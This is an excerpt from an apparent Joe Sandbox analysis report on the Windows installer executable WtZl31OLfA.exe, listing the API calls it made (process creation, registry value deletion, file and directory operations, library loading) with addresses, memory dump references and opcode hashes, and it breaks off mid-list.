                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                • String ID: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular
                                                                                • API String ID: 1892508949-1797713023
                                                                                • Opcode ID: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                                                • Opcode Fuzzy Hash: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                • CloseHandle.KERNEL32(?), ref: 00405766
                                                                                Strings
                                                                                • Error launching installer, xrefs: 00405743
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                • Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
                                                                                • Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                • Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
                                                                                APIs
                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                • Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
                                                                                • Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                • Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
                                                                                APIs
                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteOpenValue
                                                                                • String ID:
                                                                                • API String ID: 849931509-0
                                                                                • Opcode ID: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
                                                                                • Instruction ID: dc3b8117463452c80c1b03acd1c3af06063939c29d4ce1854e6773ee9d898553
                                                                                • Opcode Fuzzy Hash: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
                                                                                • Instruction Fuzzy Hash: AEF04F32A04110ABEB11BFB59B4EABE72699B80314F15803FF501B71D5D9FC99019629
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 00405292
                                                                                  • Part of subcall function 00404160: SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                • CoUninitialize.COMBASE(00000404,00000000), ref: 004052DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeMessageSendUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2896919175-0
                                                                                • Opcode ID: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
                                                                                • Instruction ID: 7e99d7d4fb8bb12c566fb67139ae5e5ce66cf86df35e622ac950679830b3b0b7
                                                                                • Opcode Fuzzy Hash: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
                                                                                • Instruction Fuzzy Hash: CAF0B4765006008BE3416794AD05B977764EFD4314F19407EEF84B62E1DB795C418F5D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                  • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                  • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
                                                                                  • Part of subcall function 004063BA: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2547128583-0
                                                                                • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                • Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
                                                                                • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                • Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E
                                                                                APIs
                                                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnableShow
                                                                                • String ID:
                                                                                • API String ID: 1136574915-0
                                                                                • Opcode ID: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
                                                                                • Instruction ID: 183564fed45e15aac194635682d2540e1570045d11d23ff7c62c61356a4b5cad
                                                                                • Opcode Fuzzy Hash: e82e6f1ee631e9591c04bcc807b45cf067b06efe57e1aced68e9ea86292db559
                                                                                • Instruction Fuzzy Hash: 92E0C2326005009FDB10AFF5AE4999D3375DF90369710007FE402F10E1CABC9C40CA2D
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C29
                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C4B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate
                                                                                • String ID:
                                                                                • API String ID: 415043291-0
                                                                                • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                • Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
                                                                                • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                • Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98
                                                                                APIs
                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
                                                                                • GetLastError.KERNEL32 ref: 0040570F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1375471231-0
                                                                                • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                • Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
                                                                                • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                • Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D
                                                                                APIs
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringWrite
                                                                                • String ID:
                                                                                • API String ID: 390214022-0
                                                                                • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                                                • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                • Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
                                                                                • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                • Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                • Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
                                                                                • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                • Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4
                                                                                APIs
                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
